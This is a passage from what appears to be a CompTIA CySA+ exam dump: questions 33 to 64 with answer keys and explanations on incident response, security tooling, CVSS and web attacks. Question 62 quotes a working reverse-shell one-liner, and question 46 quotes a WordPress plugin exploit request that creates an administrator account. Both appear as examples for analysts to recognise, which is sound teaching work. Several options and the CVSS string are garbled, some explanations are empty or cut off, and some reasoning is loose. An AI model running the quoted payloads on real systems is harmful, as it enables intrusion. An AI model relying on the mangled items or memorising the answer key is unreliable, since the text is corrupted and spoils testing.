satisfaction and trust, and enhance security operations and outcomes. The other options
are not as relevant or realistic as the MTTR decreases by 20%, as they do not reflect the
best possible outcome that this effort hopes to achieve. SIEM ingestion logs are reduced
by 20% is not a relevant outcome, as it does not indicate any improvement in the incident
response process or any reduction in analyst alert fatigue. SIEM (Security Information and
Event Management) is a security solution that collects and analyzes data from various
sources, such as logs, events, or alerts, and provides security monitoring, threat detection,
and incident response capabilities. SIEM ingestion logs are records of the data that is
ingested by the SIEM system from different sources. Reducing SIEM ingestion logs may
imply less data volume or less data sources for the SIEM system, which may not
necessarily improve its performance or accuracy. Phishing alerts drop by 20% is not a
realistic outcome, as it does not depend on the integration of DLP and CASB or any
reduction in analyst alert fatigue. Phishing alerts are notifications that indicate potential
phishing attempts or attacks, such as fraudulent emails, websites, or messages that try to
trick users into revealing sensitive information or installing malware. Phishing alerts can be
generated by various security tools or systems, such as email security solutions, web
security solutions, endpoint security solutions, or user awareness training programs.
Reducing phishing alerts may imply less phishing attempts or attacks on the organization,
which may not necessarily be influenced by the integration of DLP and CASB or any
reduction in analyst alert fatigue. False positive rates drop to 20% is not a realistic outcome
Question # 33
A security analyst needs to secure digital evidence related to an incident. The securityanalyst must ensure that the accuracy of the data cannot be repudiated. Which of thefollowing should be implemented?
A. Offline storage B. Evidence collection C. Integrity validation D. Legal hold
Answer: C
Explanation:
Integrity validation is the process of ensuring that the digital evidence has not been altered
or tampered with during collection, acquisition, preservation, or analysis. It usually involves
generating and verifying cryptographic hashes of the evidence, such as MD5 or SHA-1.
Integrity validation is essential for maintaining the accuracy and admissibility of the digital
evidence in court.
Question # 34
During a security test, a security analyst found a critical application with a buffer overflowvulnerability. Which of the following would be best to mitigate the vulnerability at theapplication level?
A. Perform OS hardening. B. Implement input validation. C. Update third-party dependencies. D. Configure address space layout randomization.
Answer: B
Explanation:
Implementing input validation is the best way to mitigate the buffer overflow vulnerability at
the application level. Input validation is a technique that checks the data entered by users
or attackers against a set of rules or constraints, such as data type, length, format, or
range. Input validation can prevent common web application attacks such as SQL injection,
cross-site scripting (XSS), or command injection, which exploit the lack of input validation
to execute malicious code or commands on the server or the client side. By validating the
input before allowing submission, the web application can reject or sanitize any malicious
or unexpected input, and protect the application from being compromised12. References:
How to detect, prevent, and mitigate buffer overflow attacks - Synopsys, How to mitigate
buffer overflow vulnerabilities | Infosec
Question # 35
Which of the following would an organization use to develop a business continuity plan?
A. A diagram of all systems and interdependent applications B. A repository for all the software used by the organization C. A prioritized list of critical systems defined by executive leadership D. A configuration management database in print at an off-site location
Answer: C
Explanation:
A prioritized list of critical systems defined by executive leadership is the best option to use
to develop a business continuity plan. A business continuity plan (BCP) is a system of
prevention and recovery from potential threats to a company. The plan ensures that
personnel and assets are protected and are able to function quickly in the event of a
disaster1. A BCP should include a business impact analysis, which identifies the critical
systems and processes that are essential for the continuity of the business operations, and
the potential impacts of their disruption2. The executive leadership should be involved in
defining the critical systems and their priorities, as they have the strategic vision and
authority to make decisions that affect the whole organization3. A diagram of all systems
and interdependent applications, a repository for all the software used by the organization,
and a configuration management database in print at an off-site location are all useful tools for documenting and managing the IT infrastructure, but they are not sufficient to develop a
comprehensive BCP that covers all aspects of the business continuity4. References: What
Is a Business Continuity Plan (BCP), and How Does It Work?, Business continuity plan
(BCP) in 8 steps, with templates, Business continuity planning | Business Queensland,
Understanding the Essentials of a Business Continuity Plan
Question # 36
A security analyst is reviewing a packet capture in Wireshark that contains an FTP sessionfrom a potentially compromised machine. The analyst sets the following display filter: ftp.The analyst can see there are several RETR requests with 226 Transfer completeresponses, but the packet list pane is not showing the packets containing the file transferitself. Which of the following can the analyst perform to see the entire contents of thedownloaded files?
A. Change the display filter to f cp. accive. pore B. Change the display filter to tcg.port=20 C. Change the display filter to f cp-daca and follow the TCP streams D. Navigate to the File menu and select FTP from the Export objects option
Answer: C
Explanation: The best way to see the entire contents of the downloaded files in Wireshark
is to change the display filter to ftp-data and follow the TCP streams. FTP-data is a protocol
that is used to transfer files between an FTP client and server using TCP port 20. By
filtering for ftp-data packets and following the TCP streams, the analyst can see the actual
file data that was transferred during the FTP session
Question # 37
A SOC analyst recommends adding a layer of defense for all endpoints that will betterprotect against external threats regardless of the device's operating system. Which of thefollowing best meets thisrequirement?
A. SIEM B. CASB C. SOAR D. EDR
Answer: D
Explanation: EDR stands for Endpoint Detection and Response, which is a layer of
defense that monitors endpoints for malicious activity and provides automated or manual
response capabilities. EDR can protect against external threats regardless of the device’s
operating system, as it can detect and respond to attacks based on behavioral analysis and
threat intelligence. EDR is also one of the tools that CompTIA CySA+ covers in its exam
A security analyst is performing vulnerability scans on the network. The analyst installs ascanner appliance, configures the subnets to scan, and begins the scan of the network.Which of the followingwould be missing from a scan performed with this configuration?
A. Operating system version B. Registry key values C. Open ports D. IP address
Answer: B
Explanation:
Registry key values would be missing from a scan performed with this configuration, as the
scanner appliance would not have access to the Windows Registry of the scanned
systems. The Windows Registry is a database that stores configuration settings and
options for the operating system and installed applications. To scan the Registry, the
scanner would need to have credentials to log in to the systems and run a local agent or
script. The other items would not be missing from the scan, as they can be detected by the
scanner appliance without credentials. Operating system version can be identified by analyzing service banners or fingerprinting techniques. Open ports can be discovered by
performing a port scan or sending probes to common ports. IP address can be obtained by
resolving the hostname or using network discovery tools.
The Chief Information Security Officer (CISO) of a large management firm has selected acybersecurity framework that will help the organization demonstrate its investment in toolsand systems to protect its data. Which of the following did the CISO most likely select?
A. PCI DSS B. COBIT C. ISO 27001 D. ITIL
Answer: C
Explanation: ISO 27001 is an international standard that establishes a framework for implementing, maintaining, and improving an information security management system
(ISMS). It helps organizations demonstrate their commitment to protecting their data and
complying with various regulations and best practices. The other options are not relevant
for this purpose: PCI DSS is a standard that focuses on protecting payment card data;
COBIT is a framework that provides guidance on governance and management of
enterprise IT; ITIL is a framework that provides guidance on service management and
delivery.
References: According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1,
one of the objectives for the exam is to “use appropriate tools and methods to manage,
prioritize and respond to attacks and vulnerabilities”. The book also covers the usage and
syntax of various cybersecurity frameworks and standards, such as ISO 27001, PCI DSS,
COBIT, and ITIL, in chapter 1. Specifically, it explains the meaning and function of each
framework and standard, such as ISO 27001, which provides a comprehensive approach
to information security management1, page 29. Therefore, this is a reliable source to verify
the answer to the question.
Question # 40
A technician identifies a vulnerability on a server and applies a software patch. Which ofthe following should be the next step in the remediation process?
A. Testing B. Implementation C. Validation D. Rollback
Answer: C
Explanation: The next step in the remediation process after applying a software patch is
validation. Validation is a process that involves verifying that the patch has been
successfully applied, that it has fixed the vulnerability, and that it has not caused any
adverse effects on the system or application functionality or performance. Validation can be
done using various methods, such as scanning, testing, monitoring, or auditing.
Question # 41
A security analyst is trying to identify anomalies on the network routing. Which of thefollowing functions can the analyst use on a shell script to achieve the objective mostaccurately?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" } B. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" } C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" } D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }
Answer: C
Explanation: The function that can be used on a shell script to identify anomalies on the
This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and
get the hostname associated with the IP address. The second lookup uses the
origin.asn.cymru.com domain to get the autonomous system number (ASN) and other
information related to the IP address. The function then prints the IP address and the ASN
information, which can help identify any routing anomalies or inconsistencies
Question # 42
While reviewing web server logs, an analyst notices several entries with the same timestamps, but all contain odd characters in the request line. Which of the following stepsshould be taken next?
A. Shut the network down immediately and call the next person in the chain of command. B. Determine what attack the odd characters are indicative of C. Utilize the correct attack framework and determine what the incident response willconsist of. D. Notify the local law enforcement for incident response
Answer: B
Explanation:
Determining what attack the odd characters are indicative of is the next step that should be
taken after reviewing web server logs and noticing several entries with the same time
stamps, but all contain odd characters in the request line. This step can help the analyst
identify the type and severity of the attack, as well as the possible source and motive of the
attacker. The odd characters in the request line may indicate that the attacker is trying to
exploit a vulnerability or inject malicious code into the web server or application, such as
SQL injection, cross-site scripting, buffer overflow, or command injection. The analyst can
use tools and techniques such as log analysis, pattern matching, signature detection, or
threat intelligence to determine what attack the odd characters are indicative of, and then
proceed to the next steps of incident response, such as containment, eradication, recovery,
An employee is no longer able to log in to an account after updating a browser. Theemployee usually has several tabs open in the browser. Which ofthe following attacks was most likely performed?
A. RFI B. LFI C. CSRF D. XSS
Answer: C
Explanation: The most likely attack that was performed is CSRF (Cross-Site Request Forgery). This is an attack that forces a user to execute unwanted actions on a web
application in which they are currently authenticated1. If the user has several tabs open in
the browser, one of them might contain a malicious link or form that sends a request to the
web application to change the user’s password, email address, or other account settings.
The web application will not be able to distinguish between the legitimate requests made by
the user and the forged requests made by the attacker. As a result, the user will lose
access to their account.
To prevent CSRF attacks, web applications should implement some form of anti-CSRF
tokens or other mechanisms that validate the origin and integrity of the requests2. These
tokens are unique and unpredictable values that are generated by the server and
embedded in the forms or URLs that perform state-changing actions. The server will then
verify that the token received from the client matches the token stored on the server before
processing the request. This way, an attacker cannot forge a valid request without knowing
the token value.
Some other possible attacks that are not relevant to this scenario are:
RFI (Remote File Inclusion) is an attack that allows an attacker to execute
malicious code on a web server by including a remote file in a script. This attack
does not affect the user’s browser or account settings.
LFI (Local File Inclusion) is an attack that allows an attacker to read or execute
local files on a web server by manipulating the input parameters of a script. This
attack does not affect the user’s browser or account settings.
XSS (Cross-Site Scripting) is an attack that injects malicious code into a web page
that is then executed by the user’s browser. This attack can affect the user’s
browser or account settings, but it requires the user to visit a compromised web
page or click on a malicious link. It does not depend on having several tabs open
in the browser.
Question # 44
Which of the following is a reason why proper handling and reporting of existing evidenceare important for the investigation and reporting phases of an incident response?
A. TO ensure the report is legally acceptable in case it needs to be presented in court B. To present a lessons-learned analysis for the incident response team C. To ensure the evidence can be used in a postmortem analysis D. To prevent the possible loss of a data source for further root cause analysis
Answer: A
Explanation:
Question # 45
An organization has tracked several incidents that are listed in the following table:
Which of the following is the organization's MTTD?
A. 140 B. 150 C. 160 D. 180
Answer: C
Explanation:
The MTTD (Mean Time To Detect) is calculated by averaging the time elapsed in detecting
incidents. From the given data: (180+150+170+140)/4 = 160 minutes. This is the correct
answer according to the CompTIA CySA+ CS0-003 Certification Study Guide1, Chapter 4,
An analyst has received an IPS event notification from the SIEM stating an IP address,which is known to be malicious, has attempted to exploit a zero-day vulnerability on severalweb servers. The exploit contained the following snippet:/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administratorWhich of the following controls would work best to mitigate the attack represented by thissnippet?
A. Limit user creation to administrators only. B. Limit layout creation to administrators only. C. Set the directory trx_addons to read only for all users. D. Set the directory v2 to read only for all users.
Answer: A
Explanation: Limiting user creation to administrators only would work best to mitigate the
attack represented by this snippet. The snippet shows an attempt to exploit a zero-day
vulnerability in the ThemeREX Addons WordPress plugin, which allows remote code
execution by invoking arbitrary PHP functions via the REST-API endpoint /wpjson/
trx_addons/V2/get/sc_layout. In this case, the attacker tries to use the wp_insert_user
function to create a new administrator account on the WordPress site12. Limiting user
creation to administrators only would prevent the attacker from succeeding, as they would
need to provide valid administrator credentials to create a new user. This can be done by
using a plugin or a code snippet that restricts user registration to administrators34. Limiting
layout creation to administrators only, setting the directory trx_addons to read only for all
users, and setting the directory v2 to read only for all users are not effective controls to
mitigate the attack, as they do not address the core of the vulnerability, which is the lack of
input validation and sanitization on the REST-API endpoint. Moreover, setting directories to
read only may affect the functionality of the plugin or the WordPress site56. References:
Zero-Day Vulnerability in ThemeREX Addons Now Patched - Wordfence, Mitigating Zero
Day Attacks With a Detection, Prevention … - Spiceworks, How to Restrict WordPress
User Registration to Specific Email …, How to Limit WordPress User Registration to
Specific Domains, WordPress File Permissions: A Guide to Securing Your Website,
WordPress File Permissions: What is the Ideal Setting?
Question # 47
Which of the following stakeholders are most likely to receive a vulnerability scan report?(Select two).
A. Executive management B. Law enforcement C. Marketing D. Legal E. Product owner F. Systems admininstration
Answer: A,F
Explanation: Executive management and systems administration are the most likely
stakeholders to receive a vulnerability scan report because they are responsible for
overseeing the security posture and remediation efforts of the organization. Law
enforcement, marketing, legal, and product owner are less likely to be involved in the
vulnerability management process or need access to the scan results. References:
Cybersecurity Analyst+ - CompTIA, How To Write a Vulnerability Assessment Report | ECCouncil,
Driving Stakeholder Alignment in Vulnerability Management - LogicGate
Question # 48
A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
A. Hacklivist B. Advanced persistent threat C. Insider threat D. Script kiddie
Answer: C
Explanation: The user has become an insider threat by downloading software that
contains malware onto a computer that eventually infects numerous other systems. An
insider threat is a person or entity that has legitimate access to an organization’s systems,
networks, or resources and uses that access to cause harm or damage to the organization.
An insider threat can be intentional or unintentional, malicious or negligent, and can result
from various actions or behaviors, such as downloading unauthorized software, violating
security policies, stealing data, sabotaging systems, or collaborating with external
attackers.
Question # 49
An attacker has just gained access to the syslog server on a LAN. Reviewing the syslogentries has allowed the attacker to prioritize possible next targets. Which of the following isthis an example of?
A. Passive network foot printing B. OS fingerprinting C. Service port identification D. Application versioning
Answer: A
Explanation: Passive network foot printing is the best description of the example, as it
reflects the technique of collecting information about a network or system by monitoring or sniffing network traffic without sending any packets or interacting with the target. Foot
printing is a term that refers to the process of gathering information about a target network
or system, such as its IP addresses, open ports, operating systems, services, or
vulnerabilities. Foot printing can be done for legitimate purposes, such as penetration
testing or auditing, or for malicious purposes, such as reconnaissance or intelligence
gathering. Foot printing can be classified into two types: active and passive. Active foot
printing involves sending packets or requests to the target and analyzing the responses,
such as using tools like ping, traceroute, or Nmap. Active foot printing can provide more
accurate and detailed information, but it can also be detected by firewalls or intrusion
detection systems (IDS). Passive foot printing involves observing or capturing network
traffic without sending any packets or requests to the target, such as using tools like
tcpdump, Wireshark, or Shodan. Passive foot printing can provide less information, but it
can also avoid detection by firewalls or IDS. The example in the question shows that the
attacker has gained access to the syslog server on a LAN and reviewed the syslog entries
to prioritize possible next targets. A syslog server is a server that collects and stores log
messages from various devices or applications on a network. A syslog entry is a record of
an event or activity that occurred on a device or application, such as an error, a warning, or
an alert. By reviewing the syslog entries, the attacker can obtain information about the
network or system, such as its configuration, status, performance, or security issues. This
is an example of passive network foot printing, as the attacker is not sending any packets
or requests to the target, but rather observing or capturing network traffic from the syslog
server. The other options are not correct, as they describe different techniques or concepts.
OS fingerprinting is a technique of identifying the operating system of a target by analyzing
its responses to certain packets or requests, such as using tools like Nmap or Xprobe2. OS
fingerprinting can be done actively or passively, but it is not what the attacker is doing in
the example. Service port identification is a technique of identifying the services running on
a target by scanning its open ports and analyzing its responses to certain packets or
requests, such as using tools like Nmap or Netcat. Service port identification can be done
actively or passively, but it is not what the attacker is doing in the example. Application
versioning is a concept that refers to the process of assigning unique identifiers to different
versions of an application, such as using numbers, letters, dates, or names. Application
versioning can help to track changes, updates, bugs, or features of an application, but it is
not related to what the attacker is doing in the example.
Question # 50
An analyst recommends that an EDR agent collect the source IP address, make aconnection to the firewall, and create a policy to block the malicious source IP addressacross the entire network automatically. Which of the following is the best option to help theanalyst implement this recommendation?
A. SOAR B. SIEM C. SLA D. IoC
Answer: A
Explanation: SOAR (Security Orchestration, Automation, and Response) is the best option
to help the analyst implement the recommendation, as it reflects the software solution that
enables security teams to integrate and coordinate separate tools into streamlined threat
response workflows and automate repetitive tasks. SOAR is a term coined by Gartner in
2015 to describe a technology that combines the functions of security incident response
platforms, security orchestration and automation platforms, and threat intelligence
platforms in one offering. SOAR solutions help security teams to collect inputs from various
sources, such as EDR agents, firewalls, or SIEM systems, and perform analysis and triage using a combination of human and machine power. SOAR solutions also allow security
teams to define and execute incident response procedures in a digital workflow format,
using automation to perform low-level tasks or actions, such as blocking an IP address or
quarantining a device. SOAR solutions can help security teams to improve efficiency,
consistency, and scalability of their operations, as well as reduce mean time to detect
(MTTD) and mean time to respond (MTTR) to threats. The other options are not as suitable
as SOAR, as they do not match the description or purpose of the recommendation. SIEM
(Security Information and Event Management) is a software solution that collects and
analyzes data from various sources, such as logs, events, or alerts, and provides security
monitoring, threat detection, and incident response capabilities. SIEM solutions can help
security teams to gain visibility, correlation, and context of their security data, but they do
not provide automation or orchestration features like SOAR solutions. SLA (Service Level
Agreement) is a document that defines the expectations and responsibilities between a
service provider and a customer, such as the quality, availability, or performance of the
service. SLAs can help to manage customer expectations, formalize communication, and
improve productivity and relationships, but they do not help to implement technical
recommendations like SOAR solutions. IoC (Indicator of Compromise) is a piece of data or
evidence that suggests a system or network has been compromised by a threat actor, such
as an IP address, a file hash, or a registry key. IoCs can help to identify and analyze
malicious activities or incidents, but they do not help to implement response actions like
SOAR solution
Question # 51
Which of the following best explains the importance of communicating with staff regardingthe official public communication plan related to incidents impacting the organization?
A. To establish what information is allowed to be released by designated employees B. To designate an external public relations firm to represent the organization C. To ensure that all news media outlets are informed at the same time D. To define how each employee will be contacted after an event occurs
Answer: A
Explanation: Communicating with staff about the official public communication plan is
important to avoid unauthorized or inaccurate disclosure of information that could harm the
organization’s reputation, security, or legal obligations. It also helps to ensure consistency
and clarity of the messages delivered to the public and other stakeholders.
The management team requests monthly KPI reports on the company's cybersecurityprogram. Which of the following KPIs would identify how long a security threat goesunnoticed in the environment?
A. Employee turnover B. Intrusion attempts C. Mean time to detect D. Level of preparedness
Answer: C
Explanation: Mean time to detect (MTTD) is a metric that measures the average time it
takes for an organization to discover or detect an incident. It is a key performance indicator
in incident management and a measure of incident response capabilities. A low MTTD
indicates that the organization can quickly identify security threats and minimize their
impact12.
References: What Is MTTD (Mean Time to Detect)? A Detailed Explanation, Introduction to
MTTD: Mean Time to Detect
Question # 53
Two employees in the finance department installed a freeware application that containedembedded malware. The network is robustly segmented based on areas of responsibility.These computers had critical sensitive information stored locally that needs to berecovered. The department manager advised all department employees to turn off theircomputers until the security team could be contacted about the issue. Which of thefollowing is the first step the incident response staff members should take when theyarrive?
A. Turn on all systems, scan for infection, and back up data to a USB storage device. B. Identify and remove the software installed on the impacted systems in the department. C. Explain that malware cannot truly be removed and then reimage the devices. D. Log on to the impacted systems with an administrator account that has privileges toperform backups. E. Segment the entire department from the network and review each computer offline.
Answer: E
Explanation:
Segmenting the entire department from the network and reviewing each computer offline is
the first step the incident response staff members should take when they arrive. This step
can help contain the malware infection and prevent it from spreading to other systems or
networks. Reviewing each computer offline can help identify the source and scope of the
infection, and determine the best course of action for recovery12. Turning on all systems, scanning for infection, and backing up data to a USB storage device is a risky step, as it
can activate the malware and cause further damage or data loss. It can also compromise
the USB storage device and any other system that connects to it. Identifying and removing
the software installed on the impacted systems in the department is a possible step, but it
should be done after segmenting the department from the network and reviewing each
computer offline. Explaining that malware cannot truly be removed and then reimaging the
devices is a drastic step, as it can result in data loss and downtime. It should be done only
as a last resort, and after backing up the data and verifying its integrity. Logging on to the
impacted systems with an administrator account that has privileges to perform backups is a
dangerous step, as it can expose the administrator credentials and privileges to the
malware, and allow it to escalate its access and capabilities34. References: Incident
Response: Processes, Best Practices & Tools - Atlassian, Incident Response Best
Practices | SANS Institute, Malware Removal: How to Remove Malware from Your Device,
How to Remove Malware From Your PC | PCMag
Question # 54
A company is concerned with finding sensitive file storage locations that are open to thepublic. The current internal cloud network is flat. Which of the following is the best solutionto secure the network?
A. Implement segmentation with ACLs. B. Configure logging and monitoring to the SIEM. C. Deploy MFA to cloud storage locations. D. Roll out an IDS.
Answer: A
Explanation: Implementing segmentation with ACLs is the best solution to secure the
network. Segmentation is the process of dividing a network into smaller subnetworks, or
segments, based on criteria such as function, location, or security level. Segmentation can
help improve the network performance, scalability, and manageability, as well as enhance
the network security by isolating the sensitive or critical data and systems from the rest of the network. ACLs are Access Control Lists, which are rules or policies that specify which
users, devices, or applications can access a network segment or resource, and which
actions they can perform. ACLs can help enforce the principle of least privilege, and
prevent unauthorized or malicious access to the network segments or resources12.
Configuring logging and monitoring to the SIEM, deploying MFA to cloud storage locations,
and rolling out an IDS are all good security practices, but they are not the best solution to
secure the network. Logging and monitoring to the SIEM can help detect and analyze the
network events and incidents, but they do not prevent them. MFA can help authenticate the
users who access the cloud storage locations, but it does not protect the network from
attacks or breaches. IDS can help identify and alert the network intrusions, but it does not
block them34 . References: Network Segmentation: What It Is and How to Do It
Right, What is an Access Control List (ACL)? | IBM, What is SIEM? | Microsoft
Security, What is Multifactor Authentication (MFA)? | Duo Security, [What is an Intrusion
Detection System (IDS)? | IBM]
Question # 55
Which of the following best describes the goal of a tabletop exercise?
A. To test possible incident scenarios and how to react properly B. To perform attack exercises to check response effectiveness C. To understand existing threat actors and how to replicate their techniques D. To check the effectiveness of the business continuity plan
Answer: A
Explanation:
A tabletop exercise is a type of simulation exercise that involves testing possible incident
scenarios and how to react properly, without actually performing any actions or using any
resources. A tabletop exercise is usually conducted by a facilitator who presents a realistic
scenario to a group of participants, such as a cyberattack, a natural disaster, or a data
breach. The participants then discuss and evaluate their roles, responsibilities, plans,
procedures, and policies for responding to the incident, as well as the potential impacts and
outcomes. A tabletop exercise can help identify strengths and weaknesses in the incident
response plan, improve communication and coordination among the stakeholders, raise
awareness and preparedness for potential incidents, and provide feedback and
recommendations for improvement.
Question # 56
Which of the following concepts is using an API to insert bulk access requests from a fileinto an identity management system an example of?
A. Command and control B. Data enrichment C. Automation D. Single sign-on
Answer: C
Explanation: Automation is the best concept to describe the example, as it reflects the use of technology
to perform tasks or processes without human intervention. Automation can help to improve
efficiency, accuracy, consistency, and scalability of various operations, such as identity and
access management (IAM). IAM is a security framework that enables organizations to
manage the identities and access rights of users and devices across different systems and
applications. IAM can help to ensure that only authorized users and devices can access the
appropriate resources at the appropriate time and for the appropriate purpose. IAM can
involve various tasks or processes, such as authentication, authorization, provisioning,
deprovisioning, auditing, or reporting. Automation can help to simplify and streamline these
tasks or processes by using software tools or scripts that can execute predefined actions or
workflows based on certain triggers or conditions. For example, automation can help to
create, update, or delete user accounts in bulk based on a file or a database, rather than
manually entering or modifying each account individually. The example in the question
shows that an API is used to insert bulk access requests from a file into an identity
management system. An API (Application Programming Interface) is a set of rules or
specifications that defines how different software components or systems can
communicate and exchange data with each other. An API can help to enable automation
by providing a standardized and consistent way to access and manipulate data or
functionality of a software component or system. The example in the question shows that
an API is used to automate the process of inserting bulk access requests from a file into an
identity management system, rather than manually entering each request one by one. The
other options are not correct, as they describe different concepts or techniques. Command
and control is a term that refers to the ability of an attacker to remotely control a
compromised system or device, such as using malware or backdoors. Command and
control is not related to what is described in the example. Data enrichment is a term that
refers to the process of enhancing or augmenting existing data with additional information
from external sources, such as adding demographic or behavioral attributes to customer
profiles. Data enrichment is not related to what is described in the example. Single sign-on
is a term that refers to an authentication method that allows users to access multiple
systems or applications with one set of credentials, such as using a single username and
password for different websites or services. Single sign-on is not related to what is
described in the example.
Question # 57
An analyst is becoming overwhelmed with the number of events that need to beinvestigated for a timeline. Which of the following should the analyst focus on in order tomove the incident forward?
A. Impact B. Vulnerability score C. Mean time to detect D. Isolation
Answer: A
Explanation: The analyst should focus on the impact of the events in order to move the
incident forward. Impact is the measure of the potential or actual damage caused by an
incident, such as data loss, financial loss, reputational damage, or regulatory penalties.
Impact can help the analyst prioritize the events that need to be investigated based on their
severity and urgency, and allocate the appropriate resources and actions to contain and
remediate them. Impact can also help the analyst communicate the status and progress of
the incident to the stakeholders and customers, and justify the decisions and
recommendations made during the incident response12. Vulnerability score, mean time to
detect, and isolation are all important metrics or actions for incident response, but they are
not the main focus for moving the incident forward. Vulnerability score is the rating of the
likelihood and severity of a vulnerability being exploited by a threat actor. Mean time to
detect is the average time it takes to discover an incident. Isolation is the process of
disconnecting an affected system from the network to prevent further damage or spread of
the incident34 . References: Incident Response: Processes, Best Practices & Tools -
Atlassian, Incident Response Metrics: What You Should Be Measuring, Vulnerability
Scanning Best Practices, How to Track Mean Time to Detect (MTTD) and Mean Time to
Respond (MTTR) to Cybersecurity Incidents, [Isolation and Quarantine for Incident
Response]
Question # 58
Which of the following is a useful tool for mapping, tracking, and mitigating identified threatsand vulnerabilities with the likelihood and impact of occurrence?
A. Risk register B. Vulnerability assessment C. Penetration test D. Compliance report
Answer: A
Explanation: A risk register is a useful tool for mapping, tracking, and mitigating identified
threats and vulnerabilities with the likelihood and impact of occurrence. A risk register is a
document that records the details of all the risks identified in a project or an organization,
such as their sources, causes, consequences, probabilities, impacts, and mitigation
strategies. A risk register can help the security team to prioritize the risks based on their
severity and urgency, and to monitor and control them throughout the project or the
organization’s lifecycle12. A vulnerability assessment, a penetration test, and a compliance
report are all methods or outputs of identifying and evaluating the threats and
vulnerabilities, but they are not tools for mapping, tracking, and mitigating them345.
References: What is a Risk Register? | Smartsheet, Risk Register: Definition & Example,
Vulnerability Assessment vs. Penetration Testing: What’s the Difference?, What is a
Penetration Test and How Does It Work?, What is a Compliance Report? | Definition,
Types, and Examples
Question # 59
A security analyst reviews the following extract of a vulnerability scan that was performedagainst the web server:
Which of the following recommendations should the security analyst provide to harden theweb server?
A. Remove the version information on http-server-header. B. Disable tcp_wrappers. C. Delete the /wp-login.php folder. D. Close port 22.
Answer: A
Explanation: The vulnerability scan shows that the version information is visible in the
http-server-header, which can be exploited by attackers to identify vulnerabilities specific to
that version. Removing or obfuscating this information can enhance security.
References: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 4: Vulnerability
A Chief Information Security Officer wants to map all the attack vectors that the companyfaces each day. Which of the following recommendations should the company align theirsecurity controls around?
A. OSSTMM B. Diamond Model Of Intrusion Analysis C. OWASP D. MITRE ATT&CK
Answer: D
Explanation:
The correct answer is D. MITRE ATT&CK.
MITRE ATT&CK is a framework that maps the tactics, techniques, and procedures (TTPs)
of various threat actors and groups, based on real-world observations and data. MITRE
ATT&CK can help a Chief Information Security Officer (CISO) to map all the attack vectors
that the company faces each day, as well as to align their security controls around the most
relevant and prevalent threats. MITRE ATT&CK can also help the CISO to assess the
effectiveness and maturity of their security posture, as well as to identify and prioritize the
gaps and improvements .
The other options are not the best recommendations for mapping all the attack vectors that
the company faces each day. OSSTMM (Open Source Security Testing Methodology
Manual) (A) is a methodology that provides guidelines and best practices for conducting
security testing and auditing, but it does not map the TTPs of threat actors or groups Diamond Model of Intrusion Analysis (B) is a model that analyzes the relationships and
interactions between four elements of an intrusion: adversary, capability, infrastructure, and
victim. The Diamond Model can help understand the characteristics and context of an
intrusion, but it does not map the TTPs of threat actors or groups. OWASP (Open Web
the security of web applications, but it does not map the TTPs of threat actors or groups.
Question # 61
Given the following CVSS string-CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:HWhich of the following attributes correctly describes this vulnerability?
A. A user is required to exploit this vulnerability. B. The vulnerability is network based. C. The vulnerability does not affect confidentiality. D. The complexity to exploit the vulnerability is high.
Answer: B
Explanation: The vulnerability is network based is the correct attribute that describes this
vulnerability, as it can be inferred from the CVSS string. CVSS stands for Common
Vulnerability Scoring System, which is a framework that assigns numerical scores and
ratings to vulnerabilities based on their characteristics and severity. The CVSS string
consists of several metrics that define different aspects of the vulnerability, such as the
attack vector, the attack complexity, the privileges required, the user interaction, the scope,
and the impact on confidentiality, integrity and availability. The first metric in the CVSS string is the attack vector (AV), which indicates how the vulnerability can be exploited. The
value of AV in this case is N, which stands for network. This means that the vulnerability
can be exploited remotely over a network connection, without physical or logical access to
the target system. Therefore, the vulnerability is network based. Official References:
A security analyst detects an exploit attempt containing the following command:sh -i >& /dev/udp/10.1.1.1/4821 0>$lWhich of the following is being attempted?
A. RCE B. Reverse shell C. XSS D. SQL injectionc
Answer: B
Explanation: A reverse shell is a type of shell access that allows a remote user to execute
commands on a target system or network by reversing the normal direction of
communication. A reverse shell is usually created by running a malicious script or program
on the target system that connects back to the remote user’s system and opens a shell
session. A reverse shell can bypass firewalls or other security controls that block incoming
connections, as it uses an outgoing connection initiated by the target system. In this case,
the security analyst has detected an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
This command is a shell script that creates a reverse shell connection from the target
system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP
protocol.
Question # 63
An organization needs to bring in data collection and aggregation from various endpoints.Which of the following is the best tool to deploy to help analysts gather this data?
A. DLP B. NAC C. EDR D. NIDS
Answer: C
Explanation: EDR stands for Endpoint Detection and Response, which is a tool that
collects and aggregates data from various endpoints, such as laptops, servers, or mobile
devices. EDR helps analysts monitor, detect, and respond to threats and incidents on the
endpoints. EDR is more suitable than DLP (Data Loss Prevention), NAC (Network Access
Control), or NIDS (Network Intrusion Detection System) for data collection and aggregation
from endpoints.
References: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 2: Software and
Systems Security, page 75; What Is Data Aggregation? (Examples + Tools), Section: Data
Aggregation: How It Works, Subsection: 1. Data Collection.
Question # 64
A security analyst would like to integrate two different SaaS-based security tools so thatone tool can notify the other in the event a threat is detected. Which of the following shouldthe analyst utilize to best accomplish this goal?
A. SMB share B. API endpoint C. SMTP notification D. SNMP trap
Answer: B
Explanation: An API endpoint is a point of entry for a communication between two
different SaaS-based security tools. It allows one tool to send requests and receive
responses from the other tool using a common interface. An API endpoint can be used to
notify the other tool in the event a threat is detected and trigger an appropriate action. SMB
share, SMTP notification, and SNMP trap are not suitable for SaaS integration security, as
they are either network protocols or email services that do not provide a direct and secure
communication between two different SaaS tools. References: Top 10 Best SaaS Security
Tools - 2023, What is SaaS Security? A Guide to Everything SaaS Security, 6 Key
Considerations for SaaS Integration Security | Prismatic, Introducing Security for Interconnected SaaS - Palo Alto Networks
Question # 65
